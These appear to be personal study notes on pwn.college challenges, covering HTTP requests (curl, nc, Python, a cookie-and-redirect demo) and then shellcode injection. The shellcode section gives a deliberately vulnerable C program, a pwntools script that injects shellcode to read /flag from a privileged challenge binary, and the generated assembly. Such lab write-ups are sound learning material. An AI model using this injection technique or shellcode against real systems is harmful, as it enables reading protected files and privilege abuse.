pwn

0x01 pwn.college

Preparation: generate an SSH key pair and add the public key to your pwn.college account. Then log in with the private key, either through VS Code's Remote Explorer or directly from a PowerShell terminal.

http://t.csdnimg.cn/b9X6n

0x02 Sending requests

curl:

curl -H "Host: 90ff8555082552d83ed22b3934e4f3f1" http://localhost
curl -L http://localhost   # -L follows redirects

nc:

# HTTP/1.1 requires a Host header, and the header block ends with an empty line,
# so the request bytes must end in \r\n\r\n
echo -e "GET /9ddc0eb235b474b67820b7077c4fe4c7 HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 80
echo -e "GET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc localhost 80


python:

python -c "import requests; print(requests.get('http://localhost:80').text)"

python -c "import requests; print(requests.get('http://localhost:80', headers={'Host': '92a59af486b98360e57c91c48dda154c'}).text)"

requests follows redirects automatically; pass allow_redirects=False if you want to see the redirect response itself instead of the final page.
Make multiple requests in response to stateful HTTP responses using curl

curl -X GET http://127.0.0.1:80/request1 --cookie-jar cookies.txt --cookie cookies.txt

--cookie-jar writes whatever cookies the server sets to the file; --cookie reads the cookies from that file and sends them with the request. Running the same command for each step means every request carries the cookies set by the previous response.

I don't fully understand this one: it jumps from request1 straight to request4.

https://infosecwriteups.com/pwn-college-talking-to-web-walkthrough-by-karthikeyan-nagaraj-48d13b3a1216
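To see what curl -L, --cookie-jar/--cookie and requests' automatic redirect handling actually do on the wire, here is an added example (my own code, not from the page, pwn.college or the write-up linked above). It hand-builds HTTP/1.1 requests with an explicit Host header, follows Location redirects itself and carries a cookie jar across a stateful chain. The server is a constructed stand-in: its /request1 to /request4 paths, the cookies it sets and the flag text are made up for the demo.

```python
"""Hand-rolled HTTP/1.1 client with an explicit Host header, manual redirect
following and a cookie jar, run against a constructed in-process server."""
import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit


def build_request(path, host, cookies=None, method="GET"):
    """Serialize a minimal request. HTTP/1.1 requires Host, and the header
    block must end with an empty line, i.e. the bytes end in \\r\\n\\r\\n."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}", "Connection: close"]
    if cookies:
        lines.append("Cookie: " + "; ".join(f"{k}={v}" for k, v in cookies.items()))
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_response(raw):
    """Split a raw response into (status code, [(name, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return int(status_line.split()[1]), headers, body


def update_jar(jar, headers):
    """What --cookie-jar does: remember every Set-Cookie name=value."""
    for name, value in headers:
        if name == "set-cookie":
            k, _, v = value.split(";", 1)[0].partition("=")
            jar[k.strip()] = v.strip()
    return jar


def send_raw(host, port, data):
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks)


def fetch_chain(host, port, path, max_hops=10):
    """Follow Location redirects (curl -L) while replaying the jar on every
    hop (--cookie). Returns (final status, body, jar, [(path, status), ...])."""
    jar, hops = {}, []
    for _ in range(max_hops):
        raw = send_raw(host, port, build_request(path, host, jar))
        status, headers, body = parse_response(raw)
        update_jar(jar, headers)
        hops.append((path, status))
        location = dict(headers).get("location")
        if status in (301, 302, 303, 307, 308) and location:
            path = urlsplit(location).path or "/"
            continue
        return status, body.decode(), jar, hops
    raise RuntimeError("too many redirects")


class StatefulHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the challenge: /request1../request3 each set
    a cookie and redirect onward; /request4 only answers if all came back."""

    def do_GET(self):
        raw_cookie = self.headers.get("Cookie", "")
        cookies = dict(p.strip().split("=", 1) for p in raw_cookie.split(";") if "=" in p)
        if self.path in ("/request1", "/request2", "/request3"):
            n = int(self.path[-1])
            self.send_response(302)
            self.send_header("Set-Cookie", f"step{n}=ok")
            self.send_header("Location", f"/request{n + 1}")
            self.end_headers()
        elif self.path == "/request4" and all(f"step{i}" in cookies for i in (1, 2, 3)):
            body = b"flag{constructed}"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            self.send_response(403)
            self.end_headers()

    def log_message(self, *args):  # keep the demo output quiet
        pass


def demo():
    """Start the stand-in server on a free port and walk the whole chain."""
    server = HTTPServer(("127.0.0.1", 0), StatefulHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return fetch_chain("127.0.0.1", server.server_address[1], "/request1")
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    status, body, jar, hops = demo()
    print(hops, jar, status, body)
```

Drop the jar from fetch_chain (send build_request(path, host) with no cookies) and the final hop comes back 403: that is the difference between running curl with and without --cookie, and why a chain like this cannot be solved one request at a time.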

0x03 Shellcode injection

Preliminaries

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

void b1() { puts("Bye!"); }
void b2() { puts("Nope!"); }

void hello(char *name, void (*b_func)()) {
    printf("Hello %s!\n", name);
    b_func();
}

int main(int argc, char **argv) {
    char name[1024];
    gets(name);
    srand(time(0));
    if (rand() % 2) hello(b1, name);  // arguments deliberately in the wrong order
    else hello(name, b2);
}

The interesting call is hello(b1, name): name is passed in the function-pointer slot, so b_func() jumps into the buffer that gets() just filled with user input. With a non-executable stack that is a plain crash; with an executable stack the bytes you typed run as code, which is exactly the shellcode-injection primitive this module is about.

1. Write and execute shellcode to read the flag!

A quick find shows the flag is a file in the root directory, but the current user has no read permission on it.

So the injected code has to do the reading from inside the challenge process (or at least chmod the file first).

A .s suffix denotes an assembly source file.

My first attempt was to just write it in C: compiled and run as a normal program it fails with a permission error when opening the flag, because it runs as the unprivileged user rather than inside the challenge.

So let's use pwntools instead.

from pwn import *
context(arch='amd64', os='linux')

#assembly = shellcraft.sh()        # shellcode that spawns /bin/sh
assembly = shellcraft.cat("/flag")  # assembly that reads /flag and writes it to stdout

assembled = asm(assembly)   # assemble to machine code
print(assembly)             # the generated assembly, shown below
sh = process("/challenge/babyshell_level1")
sh.send(assembled)          # the challenge reads the raw bytes and jumps to them
sh.interactive()

The assembly text looks like this:

/* push b'/flag\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x67616c662f
xor [rsp], rax
/* call open('rsp', 'O_RDONLY', 'rdx') */
push SYS_open /* 2 */
pop rax
mov rdi, rsp
xor esi, esi /* O_RDONLY */
syscall
/* call sendfile(1, 'rax', 0, 0x7fffffff) */
mov r10d, 0x7fffffff
mov rsi, rax
push SYS_sendfile /* 0x28 */
pop rax
push 1
pop rdi
cdq /* rdx=0 */
syscall

The usual workflow without pwntools is to write the shellcode in a .s file, assemble it with gcc (or as) into a.out, and then use objcopy to dump just the machine code of the .text section:

objcopy --dump-section .text=b.bin a.out

cat b.bin | /challenge/babyshell_level1   # the pipe feeds the raw bytes to the challenge's stdin

https://www.freebuf.com/articles/database/321327.html

https://medium.com/@muchiemma/how-to-write-shellcode-for-shellcode-injection-and-simplify-assembly-code-development-703c3f214c46

https://github.com/J-shiro/J-shiro.github.io/blob/master/content/post/english/pwn_college/module6/index.md

https://kunalwalavalkar.gitbook.io/write-ups/pwn-college/shellcode-injection

Copyright © 2023-2025 是羽泪云诶